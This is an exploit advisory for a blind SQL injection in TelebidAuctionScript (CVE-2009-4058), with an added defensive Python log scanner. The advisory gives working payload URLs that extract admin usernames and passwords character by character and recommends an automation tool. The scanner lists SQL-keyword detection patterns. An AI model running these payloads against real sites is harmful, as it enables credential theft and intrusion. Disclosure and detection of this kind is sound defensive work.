TelebidauctionScript(aid) Blind SQL Injection Vulnerability
____________________________________

Author : Hussin X
Home   : www.IQ-TY.com
email  : darkangel_g85@Yahoo.com
____________________________________

Vendor : http://www.telebidauctionscript.com/

Demo :
_______

http://server/allauctions.php?aid=2+and+1=1 (true)
http://server/allauctions.php?aid=2+and+1=0 (false)

:: Table ::

http://server/allauctions.php?aid=2+and+(SELECT+1+from+admin+limit+0,1)=1

:: column pass and username ::

http://server/allauctions.php?aid=2+and+(SELECT+substring(concat(1,pass),1,1)+from+admin+limit 0,1)=1
http://server/allauctions.php?aid=2 and (SELECT+substring(concat(1,username),1,1) from admin limit 0,1)=1

note : Use the "bsqlbf" to write detailed information

Greetz

WwW.IQ-ty.CoM , Tryag.cc | CraCkEr | Cyber-Zone | str0ke | jiko
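A defender-side check for the probing shown in the demo URLs, as an added example that is not part of the original advisory: it scans web access logs for `allauctions.php` requests whose `aid` is not a plain integer and summarises them per client. The log lines, client addresses and response sizes are constructed, and the combined log format is an assumption.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Assumed format: Apache/nginx combined access log.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3}) (\d+|-)')
SQL_TOKENS = re.compile(r'\b(select|union|and|or|from|substring|concat|limit)\b', re.I)

# Constructed sample lines; payloads are the demo requests from the advisory.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2000:10:00:00 +0000] "GET /allauctions.php?aid=2 HTTP/1.1" 200 5120',
    '192.0.2.66 - - [01/Jan/2000:10:00:05 +0000] "GET /allauctions.php?aid=2+and+1=1 HTTP/1.1" 200 5120',
    '192.0.2.66 - - [01/Jan/2000:10:00:06 +0000] "GET /allauctions.php?aid=2+and+1=0 HTTP/1.1" 200 812',
    '192.0.2.66 - - [01/Jan/2000:10:00:07 +0000] "GET /allauctions.php'
    '?aid=2+and+(SELECT+1+from+admin+limit+0,1)=1 HTTP/1.1" 200 5120',
    '192.0.2.20 - - [01/Jan/2000:10:01:00 +0000] "GET /allauctions.php?aid=abc HTTP/1.1" 200 812',
]

def suspicious_aid(line):
    """Return (client, aid, size) when allauctions.php is requested with a non-integer aid."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, target, _status, size = m.groups()
    url = urlsplit(target)
    if not url.path.endswith('/allauctions.php'):
        return None
    # parse_qs decodes '+' and %XX, so encoded payloads are compared in clear text.
    for aid in parse_qs(url.query, keep_blank_values=True).get('aid', []):
        if not re.fullmatch(r'[0-9]+', aid):
            return client, aid, 0 if size == '-' else int(size)
    return None

def scan(lines):
    """Summarise suspicious requests per client address."""
    hits = defaultdict(list)
    for line in lines:
        hit = suspicious_aid(line)
        if hit:
            hits[hit[0]].append(hit[1:])
    return {client: {
        'requests': len(reqs),
        'sql_tokens': sum(bool(SQL_TOKENS.search(aid)) for aid, _ in reqs),
        # Differing body sizes across near-identical requests suggest a true/false oracle.
        'distinct_sizes': len({size for _, size in reqs}),
    } for client, reqs in hits.items()}

if __name__ == '__main__':
    for client, info in scan(SAMPLE_LOG).items():
        print(client, info)
```
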
CVE : CVE-2009-4058
OSVDB : 60307